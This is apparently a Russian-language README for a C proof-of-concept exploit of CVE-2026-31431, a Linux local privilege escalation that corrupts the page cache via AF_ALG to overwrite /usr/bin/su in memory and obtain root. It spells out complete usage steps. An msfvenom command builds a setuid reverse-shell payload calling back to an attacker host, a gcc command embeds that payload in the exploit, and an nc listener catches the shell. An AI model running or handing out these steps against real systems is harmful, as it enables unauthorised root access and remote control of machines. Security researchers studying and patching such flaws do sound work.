
C PoC для CVE-2026-31431 — непривилегированная LPE в Linux, эксплуатирующая повреждение page cache в AF_ALG для перезаписи /usr/bin/su и получения root.
Тривиальное повышение привилегий без прав root путём записи 4 контролируемых байт в page cache любого читаемого файла через логическую ошибку в AF_ALG (ядро 4.14 → начало 2026).
Повреждаем /usr/bin/su в памяти, затем запускаем его → получаем root.

# 1. Сгенерируйте ELF-полезную нагрузку (пример reverse shell)
msfvenom -p linux/x86/shell_reverse_tcp LHOST=<LHOST> LPORT=<LPORT> PrependSetuid=true \
PrependSetgid=true -f elf -a x86 --platform linux -o payload_x86
# 2. Компиляция (статическая, без символов, полезная нагрузка встроена через .incbin)
gcc -m32 -static -Wl,--strip-all -DPAYLOAD_FILE=payload_x86 -o copy_fail_x86 copy_fail.c
# 3. Сначала запустите слушатель (nc -lvp <LPORT>), затем запустите эксплойт на целевой машине
./copy_fail_x86
• CVE: CVE-2026-31431 • CVSS: 7.8 • Исправление: коммит a664bf3d603d
• Работает практически на всех дистрибутивах Linux 2017–2026 (включая контейнеры).
• Методика: открывает /usr/bin/su с O_RDONLY, использует AEAD-расшифровку на месте для внедрения сконструированной полезной нагрузки напрямую в page cache, минуя VFS.
• Оригинальное раскрытие и Python PoC на 732 байта → https://copy.fail
MIT — см. LICENSE. Только для образовательных целей и авторизованного тестирования. Используйте на свой страх и риск.